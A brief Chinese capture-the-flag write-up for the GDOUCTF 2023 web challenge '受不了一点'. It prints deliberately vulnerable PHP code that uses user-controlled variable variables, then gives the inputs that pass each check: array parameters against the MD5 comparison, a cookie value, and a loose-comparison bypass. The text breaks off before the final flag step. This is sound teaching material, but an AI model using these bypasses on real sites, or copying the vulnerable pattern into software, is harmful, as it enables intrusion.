[GDOUCTF 2023]受不了一点

[GDOUCTF 2023]受不了一点 wp

题目代码：

 <?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){$b=$_POST['ctf'];$a=$_POST['gdou'];if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){if(isset($_COOKIE['cookie'])){if ($_COOKIE['cookie']=='j0k3r'){if(isset($_GET['aaa']) && isset($_GET['bbb'])){$aaa=$_GET['aaa'];$bbb=$_GET['bbb'];if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){$give = 'cancanwordflag';$get ='hacker!';if(isset($_GET['flag']) && isset($_POST['flag'])){die($give);}if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){die($get);}foreach ($_POST as $key => $value) {$$key = $value;}foreach ($_GET as $key => $value) {$$key = $$value;}echo $flag;}else{echo "洗洗睡吧";}}else{echo "行不行啊细狗";}}
}
else {echo '菜菜';
}
}else{echo "就这?";
}
}else{echo "别来沾边";
}
?>
别来沾边

第一个判断是 MD5 强比较

直接数组绕过，POST 传参：

gdou[]=1&ctf[]=2

第二个判断添加 cookie

Cookie: cookie=j0k3r

第三个判断是 PHP 弱比较

GET 传参：

?aaa=114514&bbb=114514a

经过第三个判断之后就直接拿到 flag 了：